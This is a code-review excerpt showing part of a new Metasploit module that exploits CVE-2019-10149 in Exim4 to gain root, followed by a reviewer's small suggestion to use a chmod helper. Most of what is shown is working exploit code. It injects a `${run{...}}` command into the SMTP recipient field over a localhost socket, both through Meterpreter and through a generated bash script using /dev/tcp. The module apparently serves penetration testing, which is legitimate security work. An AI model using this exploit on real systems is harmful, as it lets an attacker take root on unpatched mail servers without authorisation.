modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb

```diff
@@ -0,0 +1,212 @@
+          ]
+        ],
+      'DefaultOptions' =>
+        {
+          'PrependSetgid' => true,
+          'PrependSetuid' => true
+        },
+      'References'     =>
+        [
+          [ 'CVE', '2019-10149' ],
+          [ 'EDB', '46996' ],
+          [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]
+        ]
+    ))
+
+    register_options(
+      [
+        OptString.new('EXIMPATH', [ false, 'The path to the exim executable (used to check for vulnerability)' ]),
+        OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def encode_command(cmd)
+    '\x' + cmd.unpack('H2' * cmd.length).join('\x')
+  end
+
+  def inject_payload(payload)
+    if session.type == 'meterpreter'
+      socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
+      params = Rex::Socket::Parameters.new({
+        'PeerHost' => '127.0.0.1',
+        'PeerPort' => datastore['EXIMPORT']
+      })
+      #TODO: Print error if port is closed?
+      socket = socket_subsystem.create_tcp_client_channel(params)
+      socket.gets
+      socket.puts("helo localhost\n")
+      socket.gets
+      socket.puts("mail from:<>\n")
+      socket.gets
+      socket.puts("rcpt to:<${run{#{payload}}}@localhost>\n")
+      socket.gets
+      socket.puts("data\n")
+      socket.gets
+      for i in (1..31)
+        socket.puts("Received: #{i}\n")
+      end
+      socket.puts(".\n")
+      socket.gets
+      socket.puts("quit\n")
+      socket.close
+      socket_subsystem.shutdown
+    else
+      unless cmd_exec("/bin/bash -c \"exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\"; echo $?").chomp.to_i == 0
+        fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
+      end
+
+      bash_script = %|
+        #!/bin/bash
+
+        exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}
+        read -u 3 && echo $REPLY
+        echo "helo localhost" >&3
+        read -u 3 && echo $REPLY
+        echo "mail from:<>" >&3
+        read -u 3 && echo $REPLY
+        echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3
+        read -u 3 && echo $REPLY
+        echo "data" >&3
+        read -u 3 && echo $REPLY
+        for i in $(seq 1 30); do
+          echo 'Received: $i' >&3
+        done
+        echo "." >&3
+        read -u 3 && echo $REPLY
+        echo "quit" >&3
+        read -u 3 && echo $REPLY
+        exec 3<&-
+      |
+
+      @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+      write_file(@bash_script_path, bash_script)
+      register_file_for_cleanup(@bash_script_path)
+      cmd_exec("chmod +x #{@bash_script_path}")
```

Comment:
The `chmod` method is a convenient wrapper, and defaults to `0700`:

```suggestion
      chmod @bash_script_path
```